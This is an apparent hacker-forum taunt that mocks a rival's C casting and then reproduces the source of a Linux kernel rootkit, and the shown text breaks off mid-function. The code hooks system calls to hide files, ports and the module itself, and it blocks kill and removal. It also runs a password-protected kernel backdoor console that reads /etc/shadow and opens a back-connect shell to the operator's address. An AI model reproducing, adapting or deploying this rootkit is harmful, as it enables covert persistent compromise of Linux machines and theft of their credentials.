"USE CASTING IN YOUR C CODE BITCH"

[garfield]

"USE CASTING IN YOUR C CODE BITCH"

"kecoak sombong dulu sekarang selamanya are u sure there will never be
someone better? do u know my real nick do u know my real name? no !"
some ppl think they're very good let me teach them basic c
it's about casti
check this code:
sys_call_table[__NR_unlink] = o_unlink;

meanwhile you've declare the prototype as
asmlinkage int (*o_unlink)(const char __user *);

are u sure it's int????



how to use casting in c ??? here if you're unsore what should be the ret
val

=======

use this trick:

kill_asli = (void *) (proto_sys_call[__NR_kill]);


====

c0mp4r3 your c0d3s

cr0security.h
===
/*
* cr0security's rootkit header file
* © Copyright by Cr0security All Rights Reserved
* http://www.cr0security.com
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
*
*/
#ifndef _cr_H_
#define _cr_H_
/*cr_PID will be replaced by configure_lkm.pl */
#define cr0security
#define cr_PID 16000
#define our_dmesg_path "/var/log/dmesg"
#define cr_PROC "cr0security"
#define GETOPT_LACK_VALIDATION_PATH "/home/ev1lut10n/Desktop/cr_lkm/"

#define cr_PORT "7777"
#define cr_PORT_HEX "1E61"

#define cr_backconnect_PORT "7778"
#define cr_backconnect_PORT_HEX "1E62"


#define int_cr_kern_port 3737
#define cr_kern_PORT_HEX "e99"
#define string_cr_kern_port "3737"


#define END {set_fs(old_fs);}
#define KERN {old_fs=get_fs(); set_fs(KERNEL_DS);}
#define TRUE 1
#define FALSE 0
#define PROC_NET_TCP "/proc/net/tcp"
#define the_pass "password:"
#define myprocessor "/home/ev1lut10n/Desktop/cr_lkm/cr0securityd"
/*0xc05d2180 will be replaced by configure_lkm.pl */
unsigned long *proto_sys_call = (unsigned long *) 0xc05d2180;
unsigned long *invalid = (unsigned long *) 0xdeadbeef;
typedef int boolean;
size_t Length,Length2,Length3,Length4,Length5,Length6;
const char __user *buf_modified;
const char password[6] = "cr0sec";
const char null_terminate[5] = "\0x00";
char *mypassword;
char *tricky;
struct socket;
struct sockaddr;
struct sockaddr_in;
typedef int cr0;
typedef struct socket *cr0sock;
cr0sock server_sock,master_sock,mys0ck;
static cr0 result,panjang,total_pass,char_array;
static char cr0_buffer[980];
char *sockbuffer;
char *sockbuffer_cmd;
char *sockbuffer_menu_rootkit;
char *cmd_buffer;
char *clean_buffer;
char *envp[3];
char *two_last;
long r1m;
mm_segment_t old_fs;
static char valid_char[16] = {'b','c','s','e','x','i','t','h','d','w','o','p','r','1','a','l'};
static char *log_path = "/bin/dat";
//static struct task_struct *tcpd_thread;
char* cr_motd = "\n========================================="
"\nWelcome to Cr0security TCPD Console"
"\n=========================================="
"\navailable commands:\n"
"bcs - shd - who - psa - prt - help - exit\n"
"description:"
"\nbcs - back connect to your current ip via port 7778 (setup netcat to listen on 7778)"
"\nshd - seed command : view /etc/shadow"
"\npsa - seed command : ps aux | tail"
"\nwho - seed command : show who is logged on"
"\nprt - print your command's result"
"\nhelp - print this help"
"\nexit - exit this console"
"\nconsole > ";
char* cr_console = "\nconsole > ";
char* cr_failed_epic = "\nWrong password ! Access Denied\n";
static inline cr0 cr0security resumer(cr0sock master_sock,struct sockaddr_in master_addr);
/*
static char* cr0_substring(const char str[6],cr0 len_original_string,cr0 length_from_last);
*/
static int crdaemon(cr0sock master_sock,struct sockaddr_in master_addr);
static inline char *crrepinval(char *kern_heap,const char __user *buf,cr0 ev1lmode);
static inline size_t cr_send(struct socket *sock, const char *Buffer, size_t Length);
static inline ssize_t cr_recvmsg(cr0sock master_sock, void *cr0_buffer, size_t Length3);
char *log_path_buf3;
struct file *ev1l_proc,*ev1l_proc_net_tcp;
char *incoming_data;
char *successfull_msg = "Command has been executed successfully, to print the result type 'prt'\n";
char *failure = "Failed to execute your command !\n";
char hasil_konversi[10];
char predict_buffer[70];
char got_real_bufer[71];
cr0 status,konter,bit_mesin,nilai_kembali, bind, listen,cr0_data_size,__cr0_accept,____cr0_accept,ev1lmode,gmon_ops_return,i,j,executed,log_path_length;
char *tmp,*kern_heap;
cr0 *pointer_berupa_integer;
u_char *tmpbuf;
cr0 should_i_disable_sys_kill = 1;
cr0 sockbuf2_length,sockbuf1_length;
boolean found,cr0_stat,end_of_proc_net_tcp,already,validchar;
char *cr0_heap,*cr0_argumen,*str2;
cr0 how_much,len2,panjang_fake_net,panjang_fake_net_hex,panjang_dmesg_buffer,konter,rename_konter,konter2=0,totheap=0;
static cr0 dmesg_size = 256;
struct file *ev1l_dmesg,*raidon;
void *dmesg_buffer,*kmalloc_buffer,*k_m_a_l_l_o_c__b_u_f_f_e_r,*vmalloc_buffer,*unknown_buffer;
char *rkmalloc_buffer;
void *k_m_a_l_l_o_c__b_u_f_f_e_r;
boolean do_fake,do_fake_hex,rename_found;
unsigned long *retback_val;
char *file_buf,*lemme_lemme_maho,*rename_oldname;
static char *fake_net,*fake_net_hex;
/*msghdr for sock_rcvmsg and sock_sendmsg*/
typedef struct msghdr h4x0rmsg;
static inline h4x0rmsg crfillmsgbuffer(h4x0rmsg msgx);
struct iovec iov;
/*ksocket header taken from ksocket made by @song.xian-guang@hotmail.com*/
typedef struct socket *ksocket_t;
inline char *inet_ntoa(struct in_addr *in);
inline ksocket_t kaccept(ksocket_t socket, struct sockaddr *address, cr0 *address_len);
/*eof ksocket*/
boolean letmein;
size_t orig_len;
char *master_ip;
char *tmpbufx;
char *tmpcharbuf;
char *p;
static inline char* crtruncate(const char* str,cr0 len);
static inline char* replace_string(char *full_str,char *old_str, char *new_str);
static inline char *crinst(cr0 nomer);
static inline char *crflp_open(char *thecmd);
inline unsigned long *cr0repop(void *cr0_argumen);
static char cmd_pawned_cmd[11][7] = {{"pgrep"},{"ps"},{"pstree"},{"pmap"},{"grep"},{"lsof"},{"top"},{"ls"},{"dir"},{"kstat"},{"stat"}};
static char hijacked_syscall[6][12] = {{"sys_kill"},{"sys_write"},{"sys_unlink"},{"sys_unlinkat"},{"sys_open"},{"sys_rename"}};
static char forbidden_files_to_read[7][16] = {{"cr0security"},{"linux_"},{"exploit"},{"Makefile"},{"configure_lkm.pl"},{"install.pl"},{"/dev/kmem"}};
asmlinkage long (*chdir_asli)(const char __user *filename);
asmlinkage long (*rmdir_asli)(const char __user *pathname);
asmlinkage long (*rename_asli)(const char __user *oldname,const char __user *newname);
asmlinkage long (*kill_asli)(cr0 pid, cr0 sig);
asmlinkage long (*write_asli)(unsigned int fd, const char __user *buf,size_t count);
asmlinkage long (*open_asli)(const char __user *filename,cr0 flags, cr0 mode);
asmlinkage long (*unlink_asli)(const char __user *pathname);
#if (LINUX_VERSION_CODE >= KERNEL_VERSION(2,6,18))
asmlinkage long (*unlinkat_asli)(cr0 dfd, const char __user * pathname, cr0 flag);
#endif
#endif /*#ifndef _cr_H_*/

=============


cr0security.c

==========
/*
* cr0security kernel space rootkit version 1.0
* © Copyright by Cr0security All Rights Reserved
* http://www.cr0security.com
*
* this rootkit just a module of current botnet development (cr0security's botnet)
* features:
* - kernel space daemon :
* ~ check who's on the box remotely
* ~ view /etc/shadow remotely
* ~ on demand back connect
* ~ checking process remotely
* - hiding files and directory
* - hiding from netstat
* - anti kill process
* - prevent open, rm, rmmod, fake view
* - hiding module
* - kernel space keylogger
* Tested on :
* - linux 2.6.18-274.12.1.el5 - SMP - x86_64 (CentOS)
* - linux 2.6.18-238.19.1.el5PAE - SMP - i686 (CentOS)
* - linux 2.6.32-279.2.1.el6.i686 (CentOS)
* - linux-3.3-rc6 - i686 (Debian)
* - linux-2.6.35-22-generic - i686 (Debian)
* - linux-2.6.27.1 - i686 (Debian)
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
*
*/
#include <linux/highmem.h>
#include <linux/delay.h>
#include <linux/syscalls.h>
#include <linux/module.h>
#include <linux/string.h>
#include <linux/moduleparam.h>
#include <linux/kernel.h>
#include <linux/init.h>
#include <linux/version.h>
#ifdef CONFIG_SMP
#if(LINUX_VERSION_CODE < KERNEL_VERSION(3,0,0))
#include <linux/smp_lock.h>
#endif
#endif
#if(LINUX_VERSION_CODE >= KERNEL_VERSION(2,6,33))
#include <generated/autoconf.h>
#else
#include <linux/autoconf.h>
#endif
#include <linux/sched.h>
#include <linux/unistd.h>
#include <linux/linkage.h>
#include <linux/types.h>
#include <linux/fcntl.h>
#include <net/sock.h>
#include <linux/in.h>
#include <linux/kthread.h>
#include <linux/vmalloc.h>
#include <linux/ctype.h>
#include "cr0security.h"

static inline void cr0security cr_sendmsg(cr0sock master_sock,char *msg_to_send,char *alternate_msg)
{
cr0 filpo = 0;

KERN
if (strstr(msg_to_send,"cr0sec")) {
log_path_buf3 = kmalloc(1012,GFP_KERNEL);
log_path_buf3 = crflp_open(unknown_buffer);
sockbuffer = kmalloc(1012,GFP_KERNEL);
Length6 = sprintf(sockbuffer, log_path_buf3);
}
else {
sockbuffer = kmalloc(300,GFP_KERNEL);
if (executed == 0)
Length6 = sprintf(sockbuffer,msg_to_send);
else
Length6 = sprintf(sockbuffer,alternate_msg);
}
cr_send(master_sock,sockbuffer,Length6);
kfree(sockbuffer);
if (filpo == 1)
kfree(log_path_buf3);
END
}

static inline char *crinst(cr0 nomer)
{
sprintf(hasil_konversi,"%d",nomer);
return hasil_konversi;
}

inline unsigned long cr0security *cr_repop(void *cr0_argumen)
{
cr0_heap = kmalloc(256,GFP_KERNEL);
KERN
r1m = copy_from_user(cr0_heap,cr0_argumen,255);
END
if ((strstr(cr0_heap,"cr0security")) || (strstr(cr0_heap,"sbin")))
cr0_stat = TRUE;
else
cr0_stat = FALSE;
kfree(cr0_heap);
if (cr0_stat == TRUE)
retback_val = (unsigned long *) (-ENOENT);
return retback_val;
}

static inline cr0 cr0security resumer(cr0sock master_sock,struct sockaddr_in master_addr)
{
cr0 panjang_cr_failed_epic = strlen(cr_failed_epic);

KERN
sockbuffer = kmalloc((panjang_cr_failed_epic+1),GFP_KERNEL);
Length4 = sprintf(sockbuffer, "%s",cr_failed_epic);
cr_send(master_sock,sockbuffer,Length4);
kfree(sockbuffer);
END
return 0;
}

static inline void cr0security userspace_elf(char *cmd)
{
cr0 ret = 0;
char *argv[] = {myprocessor,cmd,NULL};
char *envp[] = {"HOME=/","PATH=/sbin:/usr/sbin:/bin:/usr/bin",0};

KERN
ret = call_usermodehelper(myprocessor, argv,envp, 0);
END
}

static inline cr0 cr0security umhbcs(char *ipx)
{
cr0 ret = 0;
char *argv[] = {myprocessor,"bcs",ipx, NULL};
char *envp[] = {"HOME=/", "PATH=/sbin:/usr/sbin:/bin:/usr/bin", 0};

KERN
ret = call_usermodehelper(myprocessor, argv, envp, 0);
END
return ret;
}

static cr0 cr0security crdaemon(cr0sock master_sock,struct sockaddr_in master_addr)
{
cr0 panjang_cr_console = strlen(cr_console);
cr0 cr0_executed = 0;
cr0 executed = 1;
cr0 panjang_cr_motd = strlen(cr_motd);

repeated_oops:
switch (cr0_executed) {
case 0:
sockbuffer = kmalloc((panjang_cr_motd+1),GFP_KERNEL);
Length4 = sprintf(sockbuffer, "%s",cr_motd);
KERN
cr_send(master_sock,sockbuffer,Length4);
END
kfree(sockbuffer);
break;
case 1:
sockbuffer = kmalloc((panjang_cr_console+1),GFP_KERNEL);
Length4 = sprintf(sockbuffer, "%s",cr_console);
KERN
cr_send(master_sock,sockbuffer,Length4);
END
kfree(sockbuffer);
break;
case 2:
return -1;
break;
}
while (1) {
char cmd[70] = "";
Length5 = 0;
sockbuffer_cmd = kmalloc(70,GFP_KERNEL);
KERN
Length5 = cr_recvmsg(master_sock, sockbuffer_cmd, sizeof(sockbuffer_cmd));
END
if (Length5 > 0) {
KERN
snprintf(predict_buffer,70,"%s",sockbuffer_cmd);
for (i = 0;i < 68;i++) {
validchar = 0;
for (j = 0;j < 66;j++) {
if((int)predict_buffer[i] == (int)valid_char[j])
validchar = 1;
}
if(validchar == 1)
cmd[i] = predict_buffer[i];
}
END
}
kfree(sockbuffer_cmd);
if ((strlen(cmd) > 2)) {
if ((strcmp(cmd,"exit") == 0) || (strstr(cmd,"ex")))
cr0_executed = 2;
else {
executed = 0;
printk("\ngot cmd : [%s]\n",cmd);
if((strcmp(cmd,"shd") == 0) || (strstr(cmd,"sh"))) {
KERN
userspace_elf("shd");
cr_sendmsg(master_sock,successfull_msg,failure);
END
cr0_executed = 1;
}
else if ((strcmp(cmd,"who") == 0) || (strstr(cmd,"wh"))) {
KERN
userspace_elf("who");
cr_sendmsg(master_sock,successfull_msg,failure);
END
cr0_executed = 1;
}
else if ((strcmp(cmd,"psa") == 0) || (strstr(cmd,"ps"))) {
userspace_elf("psa");
cr_sendmsg(master_sock,successfull_msg,failure);
END
cr0_executed = 1;
}
else if ((strstr(cmd,"pr")) || (strcmp(cmd,"prt") == 0)) {
KERN
cr_sendmsg(master_sock,"cr0security","cr0security");
END
cr0_executed = 1;
}
else if ((strcmp(cmd,"bcs") == 0) || (strstr(cmd,"bc"))) {
master_ip = kmalloc(16,GFP_KERNEL);
KERN
master_ip = inet_ntoa(&master_addr.sin_addr);
executed = umhbcs(master_ip);
sockbuffer = kmalloc(100,GFP_KERNEL);
Length6 = sprintf(sockbuffer, "\nback connect to [%s]\n",master_ip);
cr_send(master_sock,sockbuffer,Length6);
kfree(sockbuffer);
kfree(master_ip);
END
cr0_executed = 1;
}
else {
KERN
sockbuffer = kmalloc((panjang_cr_motd+1),GFP_KERNEL);
Length4 = sprintf(sockbuffer, "%s",cr_motd);
cr_send(master_sock,sockbuffer,Length4);
kfree(sockbuffer);
END
cr0_executed = 1;
}
}
}
goto repeated_oops;
}
return 0;
}

static inline char cr0security *crflp_open(char *unknown_buffer)
{
char buf[1012];
cr0 konter = 0;

char_array = 0;
unknown_buffer = kmalloc(1012, GFP_KERNEL);
tmpcharbuf = kmalloc(1, GFP_KERNEL);
KERN
raidon = filp_open(log_path, O_RDONLY, 0);
sprintf(unknown_buffer, "\n");
if(IS_ERR(raidon))
sprintf(unknown_buffer,"\nfailed to execute your command sorry\n");
else {
memset(buf, 0x0, 1012);
p = buf;
while ((vfs_read(raidon, p + char_array, 1, &raidon->f_pos) == 1) && (konter < 1007)) {
konter++;
if (p[char_array] == '\n' || char_array == 255)
sprintf(tmpcharbuf, "%c", p[char_array]);
else {
sprintf(tmpcharbuf, "%c", p[char_array]);
char_array = 0;
}
strcat(unknown_buffer, tmpcharbuf);
memset(buf, 0x0, 1012);
char_array++;
}
}
filp_close(raidon,NULL);
END
kfree(tmpcharbuf);
return unknown_buffer;
kfree(unknown_buffer);
}

static inline void cr0security cr(void)
{
unsigned long value;

asm volatile("mov %%cr0,%0" : "=r" (value));
if (value & 0x10000) {
value &= ~0x00010000;
asm volatile("mov %0,%%cr0": : "r" (value));
}
else
write_cr0 (read_cr0 () | 0x10000);
}

static cr0 cr0security init_cr_this_mod(void *arg)
{
cr0sock server_sock,master_sock;
struct sockaddr_in server_addr;
struct sockaddr_in master_addr;
cr0 my_sockaddr_len, master_sockaddr_len;

repeat_socket:
already = FALSE;
allow_signal(SIGKILL);
master_sock = NULL;
server_sock = NULL;
KERN
memset(&master_addr,0,sizeof(master_addr));
memset(&server_addr,0,sizeof(server_addr));
server_addr.sin_family = PF_INET;
server_addr.sin_port = htons(int_cr_kern_port);
server_addr.sin_addr.s_addr = htonl(INADDR_ANY);
my_sockaddr_len = sizeof(struct sockaddr_in);
master_sockaddr_len = sizeof(struct sockaddr_in);
result = sock_create(PF_INET, SOCK_STREAM, 0, &server_sock);
if(result < 0)
return -1;
if (server_sock==NULL)
return -1;
bind = server_sock->ops->bind(server_sock, (struct sockaddr *) &server_addr, my_sockaddr_len);
if (bind < 0)
return -1;
listen = server_sock->ops->listen(server_sock,SOMAXCONN);
if (listen < 0)
return -1;
master_sock = kaccept(server_sock, (struct sockaddr *)&master_addr, &my_sockaddr_len);
if (master_sock == NULL)
return -1;
Length = sprintf(cr0_buffer, "%s",the_pass);
cr_send(master_sock, cr0_buffer, Length);
END
while ((1) && (already == FALSE)) {
sockbuffer = kmalloc(256,GFP_KERNEL);
KERN
Length2 = cr_recvmsg(master_sock, sockbuffer, sizeof(sockbuffer));
END
if (Length2 > 0) {
KERN
panjang = strlen(password) - 1;
clean_buffer = kmalloc(panjang,GFP_KERNEL);
orig_len = panjang;
clean_buffer = crtruncate(sockbuffer,panjang);
total_pass = panjang + 10;
mypassword = kmalloc(total_pass,GFP_KERNEL);
sprintf(mypassword,"%s%s%s",password,null_terminate,null_terminate);
END
if(strstr(mypassword,clean_buffer)) {
kfree(sockbuffer);
kfree(mypassword);
kfree(clean_buffer);
goto letmein;
}
else {
kfree(sockbuffer);
kfree(mypassword);
kfree(clean_buffer);
goto wrongway;
}
}
kfree(sockbuffer);
}
wrongway:
resumer(master_sock,master_addr);
if (master_sock != NULL)
sock_release(master_sock);
if (server_sock != NULL)
sock_release(server_sock);
goto repeat_socket;
letmein:
gmon_ops_return = crdaemon(master_sock,master_addr);
if (master_sock != NULL)
sock_release(master_sock);
if (server_sock != NULL)
sock_release(server_sock);
goto repeat_socket;
//do {} while(!kthread_should_stop());
return 0;
}

/*
static char* cr0_substring(const char str[6],cr0 len_original_string,cr0 length_from_last)
{
char *ret_string_val;
cr0 i;
cr0 sisha;
printk("\nexecuting cr0_substring\n");
ret_string_val=(char*)kmalloc((cr0)(length_from_last),GFP_KERNEL);
sisha=len_original_string-length_from_last;
for (i=len_original_string;i>sisha;i--) {
printk("\ngot i : [%d]\n",i);
printk("\ngot char val: %c\n",str[i]);
}
i--;
printk("\ngot i : [%d]\n",i);
printk("\ngot char val: %c\n",str[i]);
return (char*)(ret_string_val);
}
*/

static inline char* cr0security crtruncate(const char* str,cr0 len)
{
char *str2;

str2 = kmalloc((cr0)(len),GFP_KERNEL);
if (strlen(str) == 0)
return (char*)(str);
else {
snprintf(str2,len,"%s",str);
return (char*)(str2);
}
kfree(str2);
}

static inline char* cr0security replace_string(char *full_str,char *old_str, char *new_str)
{
static char buffer[4096];
char *p;

if(!(p = strstr(full_str, old_str)))
return full_str;
strncpy(buffer, full_str, p-full_str);
buffer[p-full_str] = '\0';
sprintf(buffer+(p-full_str), "%s%s", new_str, p+strlen(old_str));
return buffer;
}

static inline h4x0rmsg cr0security crfillmsgbuffer(h4x0rmsg msgx)
{
KERN
msgx.msg_name = 0;
msgx.msg_namelen = 0;
msgx.msg_iov = &iov;
msgx.msg_iovlen = 1;
msgx.msg_control = NULL;
msgx.msg_controllen = 0;
msgx.msg_flags = MSG_NOSIGNAL;
END
return msgx;
}

static inline size_t cr0security cr_send(cr0sock master_sock, const char *Buffer, size_t Length)
{
h4x0rmsg msg;

KERN
msg = (h4x0rmsg) (crfillmsgbuffer(msg));
iov.iov_base = (char*) Buffer;
iov.iov_len = Length;
len2 = sock_sendmsg(master_sock,&msg,(size_t)(Length));
END
return len2;
}

static inline ssize_t cr0security cr_recvmsg(cr0sock master_sock, void *cr0_buffer, size_t Length3)
{
h4x0rmsg msg;
ssize_t retme;

KERN
msg = (h4x0rmsg) crfillmsgbuffer(msg);
iov.iov_base = (char*) cr0_buffer;
iov.iov_len = Length3;
retme = sock_recvmsg(master_sock, &msg, Length3, 0);
END
return retme;
}

/*
brute forcing method to find sys_call_table ( Sorry, not for SMP )
taken from http://www.gadgetweb.de/linux/40-how-to-...stems.html
* note for good
ideal method should be, but the code below is just brute forcing
- get idtr using sidt
- extract the idt address from idtr
- get the address of system_call from 0x80th entry of the idt
- search system_call for our code fingerprinting
- got sys_call_table addr
*/

unsigned long **find_sys_call_table(void)
{
unsigned long ptr;
unsigned long **sctable;

sctable = NULL;
ptr = 0;
#ifdef CONFIG_SMP
goto not_for_smp;
#else
for (ptr = (unsigned long)&_unlock_kernel; ptr < (unsigned long)&loops_per_jiffy;ptr += sizeof(void *)) {
unsigned long *p;
p = (unsigned long *)ptr;
if (p[__NR_close] == (unsigned long) sys_close) {
sctable = (unsigned long **)p;
return &sctable[0];
}
}
#endif
not_for_smp:
return NULL;
}

/*kaccept taken from http://sourceforge.net/projects/ksocket/
* ksocket module by
* @song.xian-guang@hotmail.com (MSN Accounts)
* @2007-2008, China
*/

inline ksocket_t kaccept(ksocket_t socket, struct sockaddr *address, cr0 *address_len)
{
struct socket *sk;
struct socket *new_sk = NULL;
cr0 ret;

sk = (struct socket *)socket;
KERN
ret = sock_create(sk->sk->sk_family, sk->type, sk->sk->sk_protocol, &new_sk);
END
if (ret < 0)
return NULL;
if (!new_sk)
return NULL;
KERN
new_sk->type = sk->type;
new_sk->ops = sk->ops;
ret = sk->ops->accept(sk, new_sk, 0);
END
if (ret < 0)
goto error_kaccept;
if (address) {
KERN
ret = new_sk->ops->getname(new_sk, address, address_len, 2);
END
if (ret < 0)
goto error_kaccept;
}
return new_sk;
error_kaccept:
sock_release(new_sk);
return NULL;
}
/*eof kaccept*/

/*inet_ntoa function taken from ksocket by @song.xian-guang@hotmail.com */
inline char *inet_ntoa(struct in_addr *in)
{
char* str_ip = NULL;
u_int32_t int_ip = 0;

KERN
str_ip = kmalloc(16 * sizeof(char), GFP_KERNEL);
if (!str_ip)
return NULL;
else
memset(str_ip, 0, 16);
int_ip = in->s_addr;
sprintf(str_ip, "%d.%d.%d.%d", (int_ip ) & 0xFF,(int_ip >> 8 ) & 0xFF,(int_ip >> 16) & 0xFF,(int_ip >> 24) & 0xFF);
return str_ip;
kfree(str_ip);
END
}
/*eof ksocket's inet_ntoa*/

inline static asmlinkage unsigned long cr0security *cr_open(const char __user *filename,cr0 flags, cr0 mode)
{
found=FALSE;
tmpbuf = kmalloc(256,GFP_KERNEL);
KERN
r1m = copy_from_user(tmpbuf,filename,255);
END
for (konter=0;konter < 7;konter++) {
if (strstr(tmpbuf,forbidden_files_to_read[konter]))
found=TRUE;
}
if (found == TRUE)
return (unsigned long *) (-ENOENT);
else
return (unsigned long *) (open_asli) (filename,flags,mode);
kfree(tmpbuf);
}

inline static asmlinkage unsigned long cr0security *cr_chdir(const char __user *filename)
{
KERN
cr0_stat = FALSE;
cr_repop((void *)filename);
if (cr0_stat == FALSE)
retback_val = (unsigned long *) (chdir_asli) (filename);
END
return retback_val;
}

inline static asmlinkage unsigned long cr0security *cr_rmdir(const char __user *pathname)
{
cr0_stat = FALSE;
cr_repop((void *)pathname);
if (cr0_stat == FALSE)
retback_val = (unsigned long *) (rmdir_asli) (pathname);
return retback_val;
}

inline static asmlinkage unsigned long cr0security *cr_rename(const char __user *oldname,const char __user *newname)
{
rename_found = FALSE;
rename_oldname = kmalloc(256,GFP_KERNEL);
KERN
r1m = copy_from_user(rename_oldname,oldname,255);
END
if ((strstr(rename_oldname,"cr0security")) || (strstr(rename_oldname,"sbin")))
rename_found = TRUE;
else {
for (rename_konter = 0;rename_konter < 10;rename_konter++) {
if (strstr(rename_oldname,forbidden_files_to_read[rename_konter]))
rename_found = TRUE;
}
}
if (rename_found == TRUE)
return (unsigned long *) (-ENOENT);
else
return (unsigned long *) (rename_asli) (oldname,newname);
kfree(rename_oldname);
}

inline static asmlinkage unsigned long cr0security *cr_write(unsigned int fd, const char __user *buf,size_t count)
{
status=7777;
do_fake = FALSE;
if ((strstr(current->comm,"netstat")) || (strstr(current->comm,"|")) || (strstr(current->comm,"stat")) || (strstr(current->comm,"ss")) || (strstr(current->comm,"ip
")) || (strstr(current->comm,"cat")) || (strstr(current->comm,"pic")) || (strstr(current->comm,"more")) || (strstr(current->comm,"head"))) {
buf_modified = kmalloc(count,GFP_KERNEL);
kern_heap = kmalloc(count,GFP_KERNEL);
KERN
r1m = copy_from_user(kern_heap,buf,count);
END
if (strstr(kern_heap,cr_PORT)) {
KERN
buf_modified = (const char __user*)crrepinval(kern_heap,buf,1);
END
}
else if (strstr(kern_heap,string_cr_kern_port)) {
KERN
buf_modified = (const char __user*)crrepinval(kern_heap,buf,2);
END
}
else if (strstr(kern_heap,cr_backconnect_PORT)) {
KERN
buf_modified = (const char __user*)crrepinval(kern_heap,buf,6);
END
}
else if (strstr(kern_heap,cr_backconnect_PORT_HEX)) {
KERN
buf_modified = (const char __user*)crrepinval(kern_heap,buf,5);
END
}
else if (strstr(kern_heap,cr_PORT_HEX)) {
KERN
buf_modified = (const char __user*)crrepinval(kern_heap,buf,3);
END
}
else if (strstr(kern_heap,cr_kern_PORT_HEX)) {
KERN
buf_modified = (const char __user*)crrepinval(kern_heap,buf,4);
END
}
kfree(kern_heap);
if (do_fake == TRUE) {
count = (size_t) panjang_fake_net;
return (unsigned long *) (write_asli) (fd, buf, count);
}
else if (do_fake_hex == TRUE) {
count = (size_t) panjang_fake_net_hex;
return (unsigned long *) (write_asli) (fd,buf,count);
}
else
return (unsigned long *) (write_asli) (fd, buf, count);
}
else if (strstr(current->comm,"dmesg")) {
KERN
ev1l_dmesg = filp_open(our_dmesg_path,O_RDONLY,0);
END
if (IS_ERR(ev1l_dmesg))
goto close;
else {
dmesg_buffer = kmalloc(dmesg_size,GFP_KERNEL);
KERN
ev1l_dmesg->f_op->read(ev1l_dmesg,dmesg_buffer,dmesg_size, &ev1l_dmesg->f_pos);
r1m = copy_to_user((void*)buf,dmesg_buffer,dmesg_size);
END
count = dmesg_size;
kfree(dmesg_buffer);
}
close:
filp_close(ev1l_dmesg,NULL);
return (unsigned long *) (write_asli) (fd,buf,count);
}
else {
if ((strstr(buf,cr_PROC))) {
char *kbuf = kmalloc(count,GFP_KERNEL);
KERN
r1m = copy_from_user(kbuf,buf,count);
END
for (konter = 0;konter < 11;konter++) {
KERN
if (strstr(current->comm,cmd_pawned_cmd[konter])) {
if (strstr(kbuf,cr_PROC))
status = 0;
}
END
crinst(cr_PID);
KERN
if ((strstr(current->comm,"pmap")) && (strstr(current->comm,hasil_konversi)) && (strstr(current->comm,"stat")))
status = 2;
END
if (konter2 < 7) {
if (strstr(kbuf,hijacked_syscall[konter2]))
status = 0;
}
}
kfree(kbuf);
}
switch (status) {
case 0:
k_m_a_l_l_o_c__b_u_f_f_e_r = kmalloc(256,GFP_KERNEL);
memset(k_m_a_l_l_o_c__b_u_f_f_e_r, 0,255);
KERN
r1m = copy_to_user((void *)buf,k_m_a_l_l_o_c__b_u_f_f_e_r,255);
END
kfree(k_m_a_l_l_o_c__b_u_f_f_e_r);
retback_val = (unsigned long *) (write_asli) (fd,buf,count);
case 2:
retback_val = (unsigned long *) (-ESRCH);
break;
case 7777:
retback_val = (unsigned long *) (write_asli) (fd, buf, count);
}
return retback_val;
}
}

static inline char cr0security *crrepinval(char *kern_heap,const char __user *buf,cr0 ev1lmode)
{
if ((ev1lmode==1) || (ev1lmode==2) || (ev1lmode==6)) {
panjang_fake_net = strlen(kern_heap);
fake_net = vmalloc(panjang_fake_net);
vmalloc_buffer = vmalloc(panjang_fake_net);
}
else {
panjang_fake_net_hex = strlen(kern_heap);
fake_net_hex = vmalloc(panjang_fake_net_hex);
vmalloc_buffer = vmalloc(panjang_fake_net_hex);
}
switch (ev1lmode) {
case 1:
panjang_fake_net = strlen(kern_heap);
fake_net = replace_string(kern_heap,cr_PORT,"* ");
break;
case 2:
panjang_fake_net = strlen(kern_heap);
fake_net = replace_string(kern_heap,string_cr_kern_port,"* ");
break;
case 3:
panjang_fake_net_hex = strlen(kern_heap);
fake_net_hex = replace_string(kern_heap,cr_PORT_HEX,"0000");
break;
case 4:
panjang_fake_net_hex = strlen(kern_heap);
fake_net_hex = replace_string(kern_heap,cr_kern_PORT_HEX,"0000");
break;
case 5:
panjang_fake_net_hex = strlen(kern_heap);
fake_net_hex = replace_string(kern_heap,cr_backconnect_PORT_HEX,"0000");
break;
case 6:
panjang_fake_net = strlen(kern_heap);
fake_net = replace_string(kern_heap,cr_backconnect_PORT,"* ");
break;
}
KERN
if ((ev1lmode == 1) || (ev1lmode == 2) || (ev1lmode == 6)) {
memcpy(vmalloc_buffer,fake_net,panjang_fake_net);
r1m = copy_to_user((void*)buf,vmalloc_buffer,panjang_fake_net);
vfree(fake_net);
}
else {
memcpy(vmalloc_buffer,fake_net_hex,panjang_fake_net_hex);
r1m = copy_to_user((void*)buf,vmalloc_buffer,panjang_fake_net_hex);
vfree(fake_net_hex);
}
END
vfree(vmalloc_buffer);
return (char*)buf;
}

inline static asmlinkage unsigned long cr0security *cr_unlink(const char __user *pathname)
{
cr0_stat = FALSE;
cr_repop((void *)pathname);
if (cr0_stat == FALSE)
retback_val = (unsigned long *) (*unlink_asli)(pathname);
return retback_val;
}

#if(LINUX_VERSION_CODE >= KERNEL_VERSION(2,6,18))
inline static asmlinkage unsigned long cr0security *cr_unlinkat(cr0 dfd, const char __user * pathname, cr0 flag)
{
cr0_stat = FALSE;
cr_repop((void *)pathname);
if (cr0_stat == FALSE)
retback_val = (unsigned long *) (*unlinkat_asli)(dfd,pathname,flag);
return retback_val;
}
#endif

inline static asmlinkage unsigned long cr0security *cr_kill(cr0 pid, cr0 sig)
{
if ((should_i_disable_sys_kill > 0)) {
crinst(pid);
totheap = 6 + sizeof(hasil_konversi) + 8;
